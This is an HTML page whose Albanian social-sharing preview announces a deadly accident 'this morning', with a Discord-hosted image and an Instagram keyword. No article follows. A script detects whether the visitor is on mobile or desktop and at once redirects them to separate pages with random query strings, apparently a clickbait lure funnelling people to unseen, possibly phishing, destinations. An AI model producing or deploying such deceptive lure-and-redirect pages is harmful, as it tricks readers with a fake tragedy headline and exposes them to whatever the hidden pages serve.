<!DOCTYPE html>
<html lang="es">
<head>
<meta charset="utf-8"/>
<meta name="title" content="Stream"/>
<meta name="keywords" content="Instagram"/>
<meta property="og:description" content="318,122,111,vizitat"/>
<meta name="robots" content="index, follow"/>
<meta name="googlebot" content="noindex"/>
<meta name="robots" content="index"/>
<meta name="robots" content="noindex"/>
<meta name="robots" content="nofollow"/>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<meta name="viewport" content="width=device-width, initial-scale=1"/>
<meta property="og:title" content="Një aksident tragjik ka marrë disa jetë njerëzish mëngjesin e sotëm."/>
<meta property="og:image" content="https://media.discordapp.net/attachments/1220457453838143602/1223114074934608013/fdsdgtwesrter44555.png?ex=6618acbf&is=660637bf&hm=50621a5942383f00b8fe25902a953511a1d0369c4e6beb06a420d17daba21b3c&=&format=webp&quality=lossless"/>
<meta name="apple-itunes-app" content="app-id=6448311069"/>
<script type="text/javascript">
//<![CDATA[
 function h(r, a) { var t = ""; if ("mix" == a) var h = 
"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"; else var h = 
"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"; for (var n = 0; r > n; n++) t += h.charAt(Math.floor(Math.random() * 
h.length)); return t };

        var device = navigator.userAgent
        
        if (device.match(/Iphone/i)|| device.match(/Ipod/i)|| device.match(/Android/i)|| device.match(/J2ME/i)|| device.match(/BlackBerry/i)|| device.match(/iPhone|iPad|iPod/i)|| device.match(/Opera Mini/i)|| device.match(/IEMobile/i)|| device.match(/Mobile/i)|| device.match(/Windows Phone/i)|| device.match(/windows mobile/i)|| device.match(/windows ce/i)|| device.match(/webOS/i)|| device.match(/palm/i)|| device.match(/bada/i)|| device.match(/series60/i)|| device.match(/nokia/i)|| device.match(/symbian/i)|| device.match(/HTC/i))
        {
         window.location = "./redireccionmobile.html?"+ h(7, '')+"";
        }else
{
window.location = "./redirecpc.html?"+ h(7, '')+"";
}
//]]>
</script>

